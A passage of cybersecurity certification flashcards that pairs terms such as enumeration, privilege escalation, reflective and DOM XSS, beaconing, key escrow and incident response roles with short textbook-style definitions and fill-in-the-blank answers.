The process of assembling or compiling units of information at one sensitivity level and having the resultant totality of data being of a higher sensitivity level than the individual components
Define decomposition
The process of breaking down software to discover how it works, perhaps who created it, and, in some cases, how to prevent the software from performing malicious activity
Define Output Encoding
The process of changing data into another form using code
Define Input Validation
The process of checking all input for issues such as proper format and proper length
Define Organizational Governance
The process of controlling an organization's activities, processes, and operations
Define Deidentification
The process of deleting or masking personal identifiers, such as personal name from a set of data
Define enumeration
The process of discovering what is in the network along with any other pieces of information that might be helpful in a network attack or compromise
Privilege Escalation
The process of exploiting a bug or weakness in an operating system to allow a user to receive privileges to which she is not entitled
threat intelligence
The process of gathering threat information.
vulnerability management
The process of identification and mitigation of vulnerabilities.
whitelisting
The process of identifying and allowing as good senders a list of acceptable e-mail addresses, Internet addresses, websites, applications, or some other identifier.
Define Blacklisting
The process of identifying and blocking as bad senders a list of unacceptable e-mail addresses, Internet addresses, websites, applications, or some other identifier.
Define data correlation
The process of locating variables in the information that seem to be related
Sanitization
The process of removing all traces of a threat by overwriting the drive multiple times
Piping
The process of sending the output of one function to another function as its input
Define Key Escrow
The process of storing keys with a third party to ensure that decryption can occur
Reverse Engineering
The process of taking something apart to discover how it works and perhaps to replicate it; retracing the steps in an incident, as seen from the logs
Define Hashing
The process of using a hashing algorithm to reduce a large document or file to a character string that can be used to verify the integrity of the file.
Runtime Debugging
The process of using a programming tool to not only identify syntactic problems in code but also discover weaknesses that can lead to memory leaks and buffer overflows.
Runtime data integrity check
The process that ensures the integrity of the peripheral memory contents during runtime execution
Recovery Time Objective (RTO)
The shortest time period after a disaster or disruptive event within which a resource or function must be restored to avoid unacceptable consequences
Define Analysis
The step in the intelligence cycle where data is combed and analyzed to identify relevant pieces of information
Define Collection
The step in the intelligence cycle where data searching and organizing occurs
Define Dissemination
The step in the intelligence cycle where information is shared with those responsible for designing security controls to address issues
Define passive enumeration
The technique of capturing traffic and making educated assumptions from the traffic
Define Active Enumeration
The technique of sending packets of some sort to the network and then assessing responses
Define data exfiltration
The theft of data from a device or network
Credential Stuffing
This attack occurs when a password file is obtained by a malicious actor; the attacker uses the captured credentials to attempt to automatically authenticate to accounts which may match the credentials
Vertical Privilege Escalation
This occurs when a lower-privilege user or application accesses functions or content reserved for higher-privilege users or applications
Horizontal Privilege Escalation
This occurs when a normal user accesses content or functions reserved for other normal users
Define Advanced Persistent Threat (APT)
Threat from a highly organized attacker with significant resources that is carried out over a long period of time
Define Known Threats
Threats of which we are aware
unknown threats
Threats of which we are not aware.
spyware/adware
Tracks your Internet usage in an attempt to tailor ads and junk e-mail to your interests.
Define Beaconing
Traffic that leaves a network at regular intervals
Define Flow Analysis
Type of analysis that focuses on ensuring that confidential and private information is isolated from other information
Define Logic Bomb
Type of malware that executes when a particular event takes place
Define FIN scan
Type of scan that sets the FIN bit only
___________________ is a method to encode information in a Uniform Resource Identifier.
URL encoding. Best known is the UTF-8 character encoding standard, which is a variable-length encoding (1, 2, 3, or 4 units of 8 bits, hence the name UTF-8).
Risk Acceptance
Understanding and accepting the level of risk as well as the cost of damages that can occur
The traditional BIOS has been replaced with the ____________________.
Unified Extensible Firmware Interface (UEFI). UEFI maintains support for legacy BIOS devices, but is considered a more advanced interface than traditional BIOS.
Define Digital Rights Management (DRM)
Used to control the use of digital content
DHCP snooping
Used to prevent a poisoning attack on the DHCP database
Define content scrambling system (CSS)
Uses encryption to enforce playback and region restrictions on DVDs
Cyber Intelligence Analytics Platform (CAP) v2.0
Uses its proprietary artificial intelligence and machine learning algorithms to help organizations unravel cyber risks and threats and enables proactive cyber posture management.
Define Domain Bridging
Using as a hotspot a device that has been made a member of the domain, allowing access to the organizational network to anyone using the hotspot
Scripting
Using scripting languages to automate a process
Define Asset Value (AV)
Value of an asset. Multiplied by the exposure factor (EF) to calculate single loss expectancy (SLE)
Type 1 hypervisor
Virtualization software that is installed on hardware directly, which is why it is commonly called a bare metal hypervisor. A guest operating system runs on another level above the hypervisor. Examples include Citrix XenServer, Microsoft Hyper-V, and VMware vSphere.
__________________ is a scripting tool found in Windows servers.
Windows PowerShell
work product retention
Work done for and owned by the organization.
Reflective XSS
XSS attack in which a web application immediately returns user input in an error message or search result, without that data being made safe to render in the browser, and without permanently storing the user provided data
Define DOM XSS
XSS attack in which the entire tainted data flow from source to sink takes place in the browser. The source of the data is in the DOM, the sink is also in the DOM, and the data flow never leave the browser
The __________ corner of the Diamond Model focuses on the intent of the attack
adversary. Adversary focuses on the intent of the attack.
A(n) _____________________ is a segment of the communication path that an attack uses to access a vulnerability.
attack vector. Each attack vector can be thought of as a source of malicious content or a potentially vulnerable processor of that malicious content.
The _______________________ should indicate under what circumstance individuals should be contacted to avoid unnecessary alerts and to keep the process moving in an organized manner.
call list/escalation list. First responders to an incident should have contact information for all individuals who might need to be alerted during the investigation.
A(n) ______________________ policy is one intended to demonstrate a commitment to ethics in the activities of the principles.
code of conduct/ethics
Define Open Source Intelligence (OSINT)
consists of information that is publicly available to everyone, though not everyone knows that it is available.
Define Proprietary/Closed-Source Intelligence
consists of sources which are not publicly available and usually require a fee to access.
Salaries of employees is considered ______________________________________________
corporate confidential data. Corporate confidential data is anything that needs to be kept confidential within the organization.
A ________________ policy outlines how various data types must be retained and may rely on the data classifications described in the data classification policy.
data retention. A retention policy usually identifies the purpose of the policy, the portion of the organization affected by the policy, any exclusions to the policy, the personnel responsible for overseeing the policy, the personnel responsible for data destruction, the data types covered by the policy, and the retention schedule.
The DoD created a fork (a variation) of the dd command called ___________ that adds additional forensic functionality.
dcfldd. By simply using dd with the proper parameters and the correct syntax, you can make an image of a disk, but dcfldd enables you to also generate a hash of the source disk at the same time.
It is the role of ____________________ to develop job descriptions for those persons who will be hired for positions involved in incident response.
human resources (HR). The role of the HR department involves the following responsibilities in incident response: -Develop job descriptions for those persons who will be hired for positions involved in incident response. -Create policies and procedures that support the removal of employees found to be engaging in improper or illegal activity.
A(n) __________________ is a series of two doors with a small room between them.
mantrap. The user is authenticated at the first door and then allowed into the room. At that point, additional verification occurs (such as a guard visually identifying the person), and then the person is allowed through the second door.
In XACML, the entity that is protecting the resource that the subject (a user or an application) is attempting to access is called the ________
policy enforcement point (PEP). When the PEP receives a request from a subject, it creates an XACML request based on the attributes of the subject, the requested action, the resource, and other information.
In the _______________ phase of a key, the keying material is not yet available for normal cryptographic operations.
pre-operational. In the pre-operational phase, the keying material is not yet available for normal cryptographic operations. Keys may not yet be generated or are in the pre-activation state. System or enterprise attributes are established during this phase as well.
When security incidents occur, the quality of the response is directly related to the amount of and quality of the ____________.
preparation. Responders should be well prepared and equipped with all the tools they need to provide a robust response.
After a breach, all information released to the public and the press should be handled by _________________.
public relations. All information released to the public and the press should be handled by public relations or persons trained for this type of communication.
Granting someone the ability to reset passwords is the assignment of a(n) ________.
right. Rights allow administrators to assign specific privileges and logon rights to groups or users. Rights manage who is allowed to perform certain operations on an entire computer or within a domain, rather than on a particular object within a computer.
The _______________________ helps prioritize the application of resources to the most critical vulnerabilities during qualitative risk assessment.
risk assessment matrix. Subject experts grade all risks based on their likelihood and impact.
Puppet is a ________________________ tool.
scripting. Examples of scripting tools are Puppet, Chef, and Ansible.
The most important factor in the success of an incident response plan is the support, both verbal and financial (through the budget process), of ________________
senior leadership. Moreover, all other levels of management should fall in line with support of all efforts.
Cellebrite found a niche by focusing on collecting evidence from ______________.
smartphones. Cellebrite makes extraction devices that can be used in the field and software that does the same things.
____________________ is a function that has a reputation for issues in C++.
strcpy. It copies the C string pointed by source into the array pointed by destination, including the terminating null character (and stopping at that point). The issue is that if the destination is not long enough to contain the string we get an overrun.
___________________ is a command-line tool that can capture packets on Linux and Unix platforms.
tcpdump is a command-line tool that can capture packets on Linux and Unix platforms. A version for Windows, windump, is available as well.
A(n) ______________________ is a scan in which the scanner lacks administrative privileges on the device it is scanning.
uncredentialed scan. The good news is that uncredentialed scans expose less information than credentialed scans.
Data should be classified based on its _____________ to the organization and its ____________ to disclosure.
value, sensitivity. Data should be classified based on its value to the organization and its sensitivity to disclosure. Assigning a value to data allows an organization to determine the resources that should be used to protect the data.
Data should be classified based on its ________ to the organization.
value. Assigning a value to data allows an organization to determine the resources that should be used to protect the data.